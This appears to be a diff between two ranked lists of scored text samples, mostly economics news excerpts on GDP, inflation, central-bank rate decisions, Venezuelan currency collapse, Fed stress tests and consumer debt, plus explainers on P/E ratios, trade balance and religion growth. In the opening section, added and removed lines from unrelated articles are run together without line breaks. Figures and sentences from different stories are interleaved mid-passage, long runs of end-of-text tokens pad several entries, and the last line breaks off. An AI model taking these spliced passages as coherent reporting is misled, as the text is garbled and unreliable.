(Reuters) - Commerce Department’s Bureau of Economic Analysis’ seasonally adjusted Gross Domestic Product data on a chain-weighted basis. +Rank = 29; Score = 565248.0 +<|begin_of_text|>Price to Earnings Ratio (P/E) -Following are annualized percent changes from prior quarters, in 2005 chain dollars: +The price to earnings ratio (denoted P/E) measures the relationship between the share price to its earnings per share. It is considered one of the most important metric of a company because comparing two similar companies’ P/E shows us which is a better value. Sometimes, people will refer to this ratio as the price to earnings multiple, or simply the multiple of a company. -Q3-A Q2-F Q1 2011 GDP 2.0 1.3 2.0 1.8 Final Sales of Dom. Product 2.1 1.7 2.4 2.0 Final Sales to Dom. Buyers 2.3 1.4 2.2 1.8 PCE price index 1.8 0.7 2.5 2.4 Core PCE price index 1.3 1.7 2.2 1.4 Mkt-based PCE price index 1.8 0.6 2.5 2.5 Core Mkt-based index 1.3 1.8 2.2 1.4 GDP price index 2.8 1.6 2.0 2.1 Implicit Deflator 2.9 1.5 2.2 2.1 Consumer Spending 2.0 1.5 2.4 2.5 +What Price-Earnings Ratio Represents -Durable Goods 8.5 -0.2 11.5 7.2 +The P/E ratio lets investors know what the price of a particular stock is related to the earnings it makes. If a company makes $5 and has a share price of $50, then the P/E is simply 10 (50 divided by 5). With this information, an investor can clearly see that the general public is currently willing to pay $10 for every $1 that the company makes. This also means that the lower this number, the better value the investment potentially is. -NonDurable Goods 2.4 0.6 1.6 2.3 +What the Ratio is Telling Us -Services 0.8 2.1 1.3 1.9 Business Investment -1.3 3.6 7.5 8.6 Structures -4.4 0.6 12.9 2.7 Equipment/software 0.0 4.8 5.4 11.0 Housing Investment 14.4 8.5 20.5 -1.4 Exports -1.6 5.3 4.4 6.7 Imports -0.2 2.8 3.1 4.8 Government Purchases 3.7 -0.7 -3.0 -3.1 Federal 9.6 -0.2 -4.2 -2.8 State and Local -0.1 -1.0 -2.2 -3.4 A-Advance (1st estimate). P-Preliminary (2nd). F-final (3rd.) Seasonally adjusted annual rates, in blns of +Investors love growth. So a high P/E usually represents the general public anticipating high growth in the months ahead. This could be based on the company’s track record, anticipation of a new product launch, or macroeconomics such as a good economy. + +In some ways, this ratio also tells us the confidence level in the stock. When investors are willing to pay a higher multiple for a stock versus another, it generally means that they are more confident that the company’s share price will rise quicker the rest. + +A Simple Example + +Company A and B having a stock price of $20 and $30 respectively says nothing about the relative value of the enterprises. However, if they both earn $1 per share, then comparing their P/E ratio of 20 and 30 tells us that investors are currently willing to pay $20 for each dollar that company A earns and $30 for each dollar company B makes. With this information, we can see that company A is a relatively better value than company B if all else is equal. + +What to Watch Out For + +Investors need to take caution when comparing P/E ratios of two companies. If we look at different industries, we will see vast differences in P/E ratios. For instance, technology stocks’ having a P/E of 30 is not uncommon but an oil service company may have a P/E of 10. While the oil service company may look like a better value, it does not mean that every oil service company is a better investment than a technology company. Therefore, P/E ratios should be used to compare ================================================================================ -Rank = 27; Score = 1105920.0 -<|begin_of_text|>LONDON (Reuters) - British inflation rose in April for the first time in 10 months, but as the increase was partly due to a late Easter holiday, which pushed up transport costs, it was unlikely to alter interest rate expectations. +Rank = 30; Score = 565248.0 +<|begin_of_text|>Reserve Bank of India (RBI) governor Raghuram Rajan dashed expectations of the government, consumers and business leaders as he kept lending rates unchanged on Tuesday despite plunging inflation and mounting pressure to ease borrowing costs to aid a revival. -A woman pays a market trader for goods in Soho's Berwick Street Market in central London May 17, 2011. REUTERS/Paul Hackett +Unchanged interest rates would imply your home loan EMIs, which eat away large chunks of household incomes, are unlikely to fall anytime soon. -Official data also showed that growth in house prices eased in March, potentially tempering concerns about a bubble brewing in the property market although some more up-to-date surveys have shown prices picking up again. +High loan rates could influence people’s decision to buy houses, cars and other consumer goods, mostly bought through loans. -The consumer price index rose more than expected to an annual rate of 1.8 percent in April, from 1.6 percent in March, which had been its lowest level in more than four years, the Office for National Statistics ONS said. +The benchmark lending rate has remained unchanged since January last year, demonstrating the RBI governor’s unwavering commitment to keep inflation firmly bottled up for longer period of time, before softening of the rather hawkish stance. -It was the first rise in the CPI since June 2013 and above a Reuters poll forecast for inflation of 1.7 percent in April. +Budding revival signs in the broader economy and falling inflation rates had rekindled hopes that the RBI would lower loan rates to assist companies’ investment plans, critical to spin jobs and multiply income. -Sterling hit a 16-month high against the euro and rose against the dollar before giving up much of its gains as market expectations that the Bank of England will raise interest rates in about a year’s time remained largely intact. +Rajan retained the repo rate -- the rate at which banks borrow from RBI -- at 8%, and kept the cash reserve ratio (CRR)-- the proportion of deposits banks to have to park with the central bank -- at 4%, in the bi-month monetary policy review. -The opposition Labour party jumped on Tuesday’s figures, saying they showed the government’s complacency about the “cost of living” crisis facing many Britons as wage growth has lagged inflation. +Retail inflation eased in to a three-year low of 5.52% in October, below the central bank's target of 6% by 2016. -Economists however saw little change in price pressures. +India’s wholesale inflation rate -- the main gauge to capture country-wide price movements -- has also plunged to a five-year low of 1.77% in October, triggering a chorus of demand for lower borrowing costs to boost investment and consumer spending. -“Easter effects aside, the latest release provides little evidence of significant or broad-based price pressures,” said Victoria Clarke, an economist with bank Investec. +The next monetary policy is scheduled for February 3, 2015, but Rajan did not rule out a rate revision outside of the policy calendar depending on future price movements. -Factory gate inflation in April was weaker than economists’ predictions. +“A change in the monetary policy stance at the current juncture is premature. However, if the current inflation momentum and changes in inflationary expectations continue, and fiscal developments are encouraging, a change in the monetary policy stance is likely early next year, including outside the policy review cycle,” Rajan said. -Higher airfares linked to Easter and other transport costs helped push up consumer prices, the ONS said. Easter fell in April this year but in late March last year. +Analysts said the RBI governor could wait for cues to come from the next year’s Union budget in February before initiating any rate action. -Offsetting those rises, food price growth was the lowest in eight years as a mild spring kept vegetable prices down. +Industry leaders have been ratcheting up their demand for cheaper loans with the government also hoping that the central bank would signal a reversal of its prolonged hawkish stance that some see as affecting capacity expansion plans. -Core CPI, which excludes food costs and other items but does include transport costs, rose 2.0 percent, its strongest rate since September last year. +According to experts low and stable interest rates are critical to fast-track roads, ports, airports, and railways projects to create +================================================================================ +Rank = 31; Score = 557056.0 +<|begin_of_text|>Image caption A slowdown in key sectors such as manufacturing has hurt India's growth rate -House prices - which are an increasing source of concern for the Bank of England - were up 8.0 percent on the year in March, slowing from a 9.2 percent rise in February, the ONS also said. +India's economic growth rate picked up strongly in the most recent quarter, according to official figures. -Prices in London, however, were up 17 percent on the year, although that was less than a 17.8 percent increase in February, the biggest increase since 200 +The economy expanded at an annual rate of 4.8% in the July-to-September period, up from 4.4% in the previous quarter. + +The acceleration was faster than analysts had been expecting. + +Asia's third-largest economy has been weighed down by various factors, such as high inflation, a weak currency and a drop in foreign investment. + +This is the fourth quarter in a row that India's annual growth rate has been below the 5% mark, and the previous quarter's rate of 4.4% was the lowest for four years. + +Earlier this year, the Indian prime minister's economic advisory council lowered the growth outlook for the current financial year. + +It now expects the economy to expand by 5.3% this year, down from its earlier projection of 6.4%. + +Growth hurdles + +India's economy has been hurt by a range of factors in recent months, including a slowdown in key sectors such as mining and manufacturing. + +Slowing growth, coupled with a recovery in developed markets, such as the US, has made India a less attractive option for foreign investors. + +Speculation that the US may scale back its key economic stimulus measure has seen investors pull money out of emerging markets, such as India. + +This has affected India's currency, which dipped nearly 25% against the US dollar between January and September this year. + +Though the rupee has recovered a little since then, it is still down about 13% against the dollar since the start of this year. + +That has made imports more expensive and contributed to a high rate of consumer inflation, which was 10.1% October, up from 9.84% in September. + +High food and fuel prices have contributed to inflation becoming "entrenched", finance minister P Chidambaram said. + +As a result, the central bank has had to raise the cost of borrowing in a bid to curb inflation. + +The latest interest rate rise in October saw the key rate increase to 7.75%. + +Some observers argue that high interest rates are hurting businesses and households, and having a negative impact on the economy. + +"A combination of weak investment, high inflation and tight monetary policy would not let India's economic recovery gather steam any time soon," Miguel Chanco, Asia economist at Capital Economics, told the BBC.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 32; Score = 548864.0 +<|begin_of_text|>Growth of religion is the spread of religions and the increase of religious adherents around the world. The statistics are commonly measured by the absolute number of adherents, the percentage of the absolute growth per year, and the growth of the number of converts in the world. Projections of future religious adherence are based on assumptions that trends, total fertility rates, life expectancy, political climate, conversion rates, secularization, etc will continue. Such forecasts cannot be validated empirically and are contentious, but are useful for comparison.[1][2] + +Studies in the 21st century show that, in terms of percentage and worldwide spread, Islam is the fastest-growing religion in the world.[3][4][5][6][7][8][9][10][11] A religious forecast for 2050 by Pew Research Center concludes that global Muslim population is expected to grow at a faster rate than the non-Muslim population due primarily to the young age and high fertility rate of Muslims.[12][13] Religious conversion has little impact on Muslim population because the number of people who convert to Islam is nearly offset by those who leave Islam.[6][14][14][15][16] + +Growth of religious groups [ edit ] + +Bahá'í Faith [ edit ] + +World religions statistics place the Bahá'í Faith around 0.1% of the world population in recent years.[17][18] The World Christian Encyclopedia estimated only 7.1 million Bahá'ís in the world in 2000, representing 218 countries,[18] and its evolution to the World Christian Database (WCD) estimated 7.3 million in 2010[19] while accredited through the Association of Religion Data Archives (ARDA). However the WCD stated: "The Baha'i Faith is the only religion to have grown faster in every United Nations region over the past 100 years than the general population; Baha'i [sic] was thus the fastest-growing religion between 1910 and 2010, growing at least twice as fast as the population of almost every UN region."[20] This source's only documented flaw was to consistently have a higher estimate of Christians than in other cross-national data sets.[21] 2015's estimate is of 7.8 million Bahá'ís in the world.[22] + +From its origins in the Persian and Ottoman empires of the 19th century the Bahá'í Faith was able to gain converts elsewhere in Asia, Europe, and North America by the early 20th ================================================================================ -Rank = 28; Score = 1105920.0 +Rank = 33; Score = 522240.0 <|begin_of_text|>India has moved up in ranking from 52nd to 40th position in the Travel and Tourism Competitive Index (TTCI) of the World Economic Forum (WEF). The tourism sector in the country has been on a growth trajectory in the recent past. This data is based on the 2017 edition of the Travel and Tourism Competitiveness Report that features the latest iteration of the Travel & Tourism Competitiveness Index (TTCI). The TTCI benchmarks the travel and tourism competitiveness of 136 economies. The TTCI measures “the set of factors and policies that enable the sustainable development of the Travel & Tourism (T&T) sector, which in turn, contributes to the development and competitiveness of a country”. It comprises four sub-indexes, 14 pillars, and 90 individual indicators, distributed among the different pillars. @@ -646,26 +769,30 @@ India is ranked 55th, up by 14 places in terms of international openness, which The key reasons for India’s jump in the Travel and ================================================================================ -Rank = 29; Score = 1089536.0 -<|begin_of_text|>The U.S Federal Reserve has released the worst-case scenarios it wants banks to stress test against, and some of them are downright apocalyptic. +Rank = 34; Score = 520192.0 +<|begin_of_text|>0 -As part of the stress tests, which the Fed announced it wants banks to do annually, U.S. lenders will have to simulate the effects of a severe recession hitting the U.S. What does that involve, you ask? +I sat on the porch -In the Fed’s bleakest scenario, the United States would slip into recession in the fourth quarter of 2011 (the one we’re currently in) and post four consecutive quarters of negative growth. The unemployment rate would peak at 13.05%, while the Dow Jones Industrial Average would plunge all the way to 5,668 points (from the current level of 11,305). That would be even lower than the Dow’s financial crisis low in March 2009, when it settled at 6,547. +Listened to the rain -The Fed’s simulated recession would be deepest in the first quarter of 2012, when real GDP would contract by a whopping 7.98%. Peak unemployment wouldn’t hit until a year later. +Smoked a cigarette -Overall, the tests, known as the Comprehensive Capital Analysis and Review, lay out 14 economic metrics for banks to include as means of testing their preparedness. The metrics include Consumer Price Inflation levels, Treasury Yields and mortgage rates. +And counted to ten Oh no, here it comes again -The tests are designed for the top 31 banks in the U.S. that hold assets of US$50-billion or more. They will generate models that will produce loss estimates and see whether capital ratios are high enough to survive the worst-case scenarios. +That funny feeling ― Camper Van Beethoven, Oh No! (1985) -The Fed will also allow banks to come up with their own scenarios to stress test their finances. Either way, it will requires banks to submit their capital plans by January 9, 2012. +A quick post-Fed follow-up to “Tell My Horse”, the best-received Epsilon Theory note to date (thank you!). I’ll jump right into what I’ve got to say, without the usual 20 pages of movie quotes and the like. Well, I’ve got one quote above, because I can’t help myself. They’re the lyrics to the best break-up song ever, and they’re what Janet Yellen was singing to the market on Wednesday. -For a full list of the metrics that will be used in the tests, check out the U.S. Federal Reserve’s website. +Let’s review, shall we? Last fall, the Fed floated the trial balloon that they were thinking about ways to shrink their balance sheet. All very preliminary, of course, maybe years in the future. Then they started talking about doing this in 2018. Then they started talking about doing this maybe at the end of 2017. Two days ago, Yellen announced exactly how they intended to roll off trillions of dollars from the portfolio, and said that they would be starting “relatively soon”, which the market is taking to be September but could be as early as July. -• Email: jshmuel@nationalpost.com | Twitter: jshmuel<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +Now what has happened in the real world to accelerate the Fed’s tightening agenda, and more to the point, a specific form of tightening that impacts markets more directly than any sort of interest rate hike? Did some sort of inflationary or stimulative fiscal policy emerge from the Trump-cleared DC swamp? Umm … no. Was the real economy off to the races with sharp increases in CPI, consumer spending, and other measures of inflationary pressures? Umm … no. On the contrary, in fact. + +Two things and two things only have changed in the real world since last fall. First, Donald Trump — a man every Fed Governor dislikes and mistrusts — is in the White House. Second, the job market has heated up to the point where it is — Yellen’s words — close to being unstable, and is — Yellen’s words — inevitably going to heat up still further. + +What has happened (and apologies for the ten dollar words) is that the Fed’s reaction function has flipped 180 degrees since the Trump election. Today the Fed is looking for excuses to tighten monetary policy, not excuses to weaken. So long as the unemployment rate is on the cusp of “instability”, that’s the only thing that ================================================================================ -Rank = 30; Score = 1048576.0 +Rank = 35; Score = 518144.0 <|begin_of_text|>NEW YORK (CNNMoney.com) -- There will be no cost-of-living increase for 57 million Social Security beneficiaries next year because consumer prices have fallen, the Social Security Administration announced on Thursday. It marks the first time that Social Security benefits have not been increased year over year since the cost-of-living adjustment was put into effect in 1975. @@ -692,7 +819,7 @@ As with the first $250 recovery payment, the second one would be exempt from inc If approved by Congress, the payments would be sent out in 2010, most likely in the first half. "It wouldn't be late in 2010," the administration official ================================================================================ -Rank = 31; Score = 1032192.0 +Rank = 36; Score = 481280.0 <|begin_of_text|>Chinese Research Team that Employs High Performance Computing to Understand Weather Patterns Wins 2016 ACM Gordon Bell Prize Salt Lake City, Utah, November 17, 2016 – ACM, the world's leading professional computing society, has named a 12-member Chinese team the recipients of the 2016 ACM Gordon Bell Prize for their research project, “10M-Core Scalable Fully-Implicit Solver for Nonhydrostatic Atmospheric Dynamics.” The winning team presented a solver (method for calculating) atmospheric dynamics. The ACM Gordon Bell Prize tracks the progress of parallel computing and rewards innovation in applying high performance computing to challenges in science, engineering, and large- scale data analytics. The award was bestowed during the International Conference for High Performance Computing, Networking, Storage and Analysis (SC16) in Salt Lake City, Utah. @@ -707,30 +834,22 @@ Elaborating further, they add, “In the solver, we propose a highly efficient d The fully-implicit solver successfully scales to the entire system of the Sunway TaihuLight, a Chinese super ================================================================================ -Rank = 32; Score = 1003520.0 -<|begin_of_text|>Fresh Christmas trees are a holiday tradition, loved for their beauty and fresh, outdoorsy fragrance. However, Christmas trees often take the blame for destructive fires that occur during the holiday season. The most effective way to prevent Christmas tree fires is to keep the tree well hydrated. With proper care, a tree should remain fresh for two to three weeks. This may sound easy, but it becomes a problem if your Christmas tree is not drinking water. - -Causes for a Christmas Tree Not Taking Up Water - -Generally, when Christmas trees have problems taking up water, it’s because we tend to add products to the tree itself or the water. Avoid spray-on fire retardants and other products advertised to keep your tree fresh. Similarly, bleach, vodka, aspirin, sugar, lime soda, copper pennies or vodka have little or no effect and some can actually slow water retention and increase moisture loss. - -What works best? Plain old tap water. If you tend to be forgetful, keep a pitcher or watering can near the tree to remind you. - -How to Get a Christmas Tree to Take Up Water - -Cutting a thin sliver from the bottom of the trunk is key to keeping a tree fresh. Keep in mind that if the tree is freshly cut, you don’t need to cut the trunk. However, if the tree has been cut for longer than 12 hours before you put it in water, you must trim ¼ to ½ inch from the bottom of the trunk. +Rank = 37; Score = 475136.0 +<|begin_of_text|>At its meeting today, the Board decided to reduce the cash rate by 25 basis points to 3.0 per cent, effective 5 December 2012. -This is because the bottom of the trunk seals itself with sap after a few hours and can’t absorb water. Cut straight across and not at an angle; an angular cut makes it harder for the tree to take up water. It is also difficult to get a tree with an angular cut to stand upright. Also, don’t drill a hole in the trunk. It doesn’t help. +Global growth is forecast to be a little below average for a time. Risks to the outlook are still seen to be on the downside, largely as a result of the situation in Europe, though the uncertainty over the course of US fiscal policy is also weighing on sentiment at present. Recent data suggest that the US economy is recording moderate growth and that growth in China has stabilised. Around Asia generally, growth has been dampened by the more moderate Chinese expansion and the weakness in Europe. -Next, a large stand is critical; a Christmas tree can drink up to one quart of water for each inch of stem diameter. The National Christmas Tree Association recommends a stand with a one-gallon capacity. Never trim the bark to accommodate a too-tight stand. The bark helps the tree take up water. +Key commodity prices for Australia remain significantly lower than earlier in the year, though trends have been more mixed over the past few months. The terms of trade have declined by about 15 per cent since the peak, to a level that is still historically high. -Christmas Tree Watering Tips +Sentiment in financial markets remains better than it was in mid year, in response to signs of progress in addressing Europe's financial problems, though Europe is likely to remain a source of instability for some time. Long-term interest rates faced by highly rated sovereigns, including Australia, remain at exceptionally low levels. Capital markets remain open to corporations and well-rated banks, and Australian banks have had no difficulty accessing funding, including on an unsecured basis. Borrowing conditions for large corporations are similarly attractive and share prices have risen since mid year. -Start with a fresh Christmas tree. There’s no way to hydrate a dried up tree, even if you trim the bottom. If you aren’t sure about freshness, pull a branch slowly through your fingers. A few dry needles are no reason for concern, but look for a fresher tree if a large number of needles are loose or brittle. +In Australia, most indicators available for this meeting suggest that growth has been running close to trend over the past year, led by very large increases in capital spending in the resources sector, while some other sectors have experienced weaker conditions. Looking ahead, recent data confirm that the peak in resource investment is approaching. As it does, there will be more scope for some other areas of demand to strengthen. +Private consumption spending is expected to grow, but a return to the very strong growth of some years ago is unlikely. Available information suggests that the near-term outlook for non-residential building investment, and investment generally outside the resources sector, remains relatively subdued. Public spending is forecast to be constrained. On the other hand, there are indications of a prospective improvement in dwelling investment, with dwelling prices moving a little higher, rental yields increasing and building approvals having turned up. +Inflation is consistent with the medium-term target, with underlying measures at around 2½ per cent. The introduction of the carbon price affected consumer prices in the September quarter, and there could be some further small effects over the next couple of quarters. Partly ================================================================================ -Rank = 33; Score = 966656.0 +Rank = 38; Score = 475136.0 <|begin_of_text|>EspañolThe value of the Venezuelan bolívar has plummeted in the past month, depreciating from 102.56 to 159.02 per US dollar on the black-market exchange. November’s decline indicates that Venezuela now flirts with hyperinflation. The rule of thumb among economists is that hyperinflation occurs when inflation — the declining purchasing power of a currency as measured by a rise in the price level — exceeds 50 percent on a monthly basis. As deduced from the black-market exchange rate and the US Consumer Price Index, Venezuela’s inflation for November reached 55.27 percent.* Even the highest denomination of the bolívar, the 100 Bs. note, is now worth a mere 62.9 US cents. @@ -753,7 +872,32 @@ This year, the Chavista regime also introduced the third SICAD II rate, in an at Venezuela’s financial woes have come under immense criticism, including from prominent outlets such as the ================================================================================ -Rank = 34; Score = 962560.0 +Rank = 39; Score = 473088.0 +<|begin_of_text|>The balance of trade, commercial balance, or net exports (sometimes symbolized as NX), is the difference between the monetary value of a nation's exports and imports over a certain period.[1] Sometimes a distinction is made between a balance of trade for goods versus one for services. The balance of trade measures a flow of exports and imports over a given period of time. The notion of the balance of trade does not mean that exports and imports are "in balance" with each other. + +If a country exports a greater value than it imports, it has a trade surplus or positive trade balance, and conversely, if a country imports a greater value than it exports, it has a trade deficit or negative trade balance. As of 2016, about 60 out of 200 countries have a trade surplus. The notion that bilateral trade deficits are bad in and of themselves is overwhelmingly rejected by trade experts and economists.[2][3][4][5][6] + +Explanation [ edit ] + +Balance of trade in goods and services (Eurozone countries) + +US trade balance from 1960 + +U.S. trade balance and trade policy (1895–2015) + +U.S. trade deficit (in billions, goods and services) by country in 2017 + +U.K. balance of trade in goods (since 1870) + +The balance of trade forms part of the current account, which includes other transactions such as income from the net international investment position as well as international aid. If the current account is in surplus, the country's net international asset position increases correspondingly. Equally, a deficit decreases the net international asset position. + +The trade balance is identical to the difference between a country's output and its domestic demand (the difference between what goods a country produces and how many goods it buys from abroad; this does not include money re-spent on foreign stock, nor does it factor in the concept of importing goods to produce for the domestic market). + +Measuring the balance of trade can be problematic because of problems with recording and collecting data. As an illustration of this problem, when official data for all the world's countries are added up, exports exceed imports by almost 1%; it appears the world is running a positive balance of trade with itself. This cannot be true, because all transactions involve an equal credit or debit in the account of each nation. The discrepancy is widely believed to be explained by transactions intended to launder money or evade taxes, smuggling and other visibility problems. Especially for developing countries, the transaction statistics are likely to be inaccurate. + +Factors +================================================================================ +Rank = 40; Score = 471040.0 <|begin_of_text|>New data from the Federal Reserve continues to highlight a reemergence of debt based consumer spending. Americans are largely buying stuff they can’t afford with money they don’t have. The Fed’s consumer credit report highlights a troubling trend. Over the last 12 months 95 percent of all consumer debt growth has come from people buying cars and young Americans going deep into debt to pursue a college education. A car quickly loses its value once it drives off the lot and many college degrees are massively over valued only being supported by easy financing. This is a disturbing trend, even more troubling than the last debt fueled bubble. One can argue with housing that at least people are getting an asset that generally rises with inflation. But a car? A for-profit degree? The debt juice is now flowing once again. Buying cars while incomes drop @@ -772,7 +916,7 @@ Total student debt in the US is well over $1.2 trillion as measured by new Fed d So we are now having another expansion completely based on easy access to debt. For banks, this access never went away in the form of cheap money via the Fed. The Fed’s balance sheet is now quickly approaching $4 trillion. We are told that there is no inflation but real estate values are spiking at a rate last seen during the last bubble but household incomes are not going up. Of course this time the price of real estate is being pushed up by Wall Street investors. At least in the last bubble, most Americans had access to mortgages, credit cards, and all other forms of cheap debt to party with Wall Street. Today, it seems like consumers have the option of auto loans or student debt. Good luck trying to buy a home in some ================================================================================ -Rank = 35; Score = 942080.0 +Rank = 41; Score = 458752.0 <|begin_of_text|>Black Friday is not dead. In fact, this may be the strongest Black Friday for retailers in years. Shoppers were already lined up outside of Target, Best Buy, and J.C. Penney, according to CNBC. Walmart stores went into Black Friday sales mode at 6 p.m. @@ -785,127 +929,135 @@ Another plus for retailers: moderate weather. It is chilly in much of the countr Much of the shopping has shifted online, however. According to Adobe Analytics, Americans spent $1.52 billion on Thanksgiving evening–a 17 percent surge over last year.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 36; Score = 937984.0 -<|begin_of_text|>Reserve Bank of India (RBI) governor Raghuram Rajan dashed expectations of the government, consumers and business leaders as he kept lending rates unchanged on Tuesday despite plunging inflation and mounting pressure to ease borrowing costs to aid a revival. +Rank = 42; Score = 450560.0 +<|begin_of_text|>SAO PAULO, Jan 26 (Reuters) - Economists raised sharply their forecasts for Brazil's 2015 inflation rate to a level further exceeding the official target, a weekly central bank poll showed on Monday. Inflation is expected to end 2015 at 6.99 percent, up from 6.67 percent in the prior week's survey and 6.53 percent a month ago, according to the median forecast of about 100 market economists. Brazil's government targets an inflation rate of 4.5 percent, with a tolerance margin of two percentage points. The median estimate for economic growth this year dropped to 0.13 percent from 0.38 percent in the previous week's survey and 0.55 percent a month earlier. (pct) 2015 2016 previous new previous new forecast forecast forecast forecast Consumer inflation 6.67 6.99 5.70 5.60 Exchange rate 2.80 2.80 2.85 2.90 (reais per U.S dollar, end-period) Interest rate 12.50 12.50 11.50 11.50 (end-period) GDP growth 0.38 0.13 1.80 1.54 Industrial output 0.71 0.69 2.65 2.50 (Reporting by Asher Levine; Editing by Toby Chopra)<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_